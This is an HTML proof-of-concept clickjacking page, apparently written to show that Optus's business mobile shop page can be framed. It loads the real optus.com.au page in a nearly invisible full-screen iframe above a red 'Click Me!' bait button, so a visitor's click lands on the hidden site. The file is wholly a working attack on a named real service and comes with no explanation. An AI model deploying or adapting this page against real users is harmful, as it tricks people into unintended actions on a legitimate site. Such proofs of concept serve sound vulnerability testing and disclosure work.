<!DOCTYPE html>
<html>
<head>
    <title>Clickjacking PoC - Optus</title>
    <style>
        body {
            margin: 0;
            overflow: hidden;
        }
        iframe {
            position: absolute;
            width: 100%;
            height: 100%;
            opacity: 0.01;
            z-index: 999;
            pointer-events: auto;
        }
        #bait {
            position: absolute;
            top: 200px;
            left: 300px;
            width: 200px;
            height: 50px;
            background-color: red;
            color: white;
            text-align: center;
            line-height: 50px;
            z-index: 1;
        }
    </style>
</head>
<body>
    <div id="bait">Click Me!</div>
    <iframe src="https://www.optus.com.au/business/mobile/plans/shop"></iframe>
</body>
</html>
